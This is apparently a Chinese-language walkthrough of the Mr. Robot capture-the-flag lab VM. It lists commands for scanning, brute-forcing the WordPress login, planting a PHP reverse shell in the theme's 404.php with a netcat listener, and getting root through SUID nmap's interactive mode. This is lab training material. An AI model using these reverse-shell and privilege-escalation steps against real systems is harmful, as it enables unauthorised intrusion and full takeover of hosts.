靶机:192.168.12.129
kali: 192.168.12.128
一、信息收集
nmap -sV 192.168.12.129
–扫描开放端口
dirsearch -u http://192.168.12.129/
–扫下web目录
–robots.txt和wordpress登录框–
得到第一个key
fsocity.dic打开是个字典,猜测可以用来爆破wordpress登录框
–bp抓包,fsocity当作字典–—80多万。。。。。。—
可以确定用户名是Elliot,那用户名不用爆了(长度4204估计回显的是密码错误)
爆破了n年(丢。密码在字典倒数第二个,倒过来就好爆了)
用户名:Elliot 密码:ER28-0652
–登陆–
find / -name php-reverse-shell.php
kali自带的反弹shell
cd /usr/share/laudanum/php/
—复制php-reverse-shell.php的内容到wp中的404.php
修改ip,port为监听机kali的ip与端口
nc -lvp 4444
-监听本地4444端口
访问http://192.168.12.129/wp-admin/404.php
–成功弹shell–
python -c 'import pty; pty.spawn("/bin/bash")'
–优化终端
二、提权(SUID提权)
cd
home文件夹存在robot用户,并且在其中发现登录密码
robot密码:abcdefghijklmnopqrstuvwxyz
su - robot
–登陆robot用户
Linux suid 提权
find / -perm -u=s -type f 2>/dev/null
—查找suid文件
`
ls -l /usr/local/bin/nmap
–查看下nmap的权限是root权限
nmap --interactive
–交互
!sh
—成功root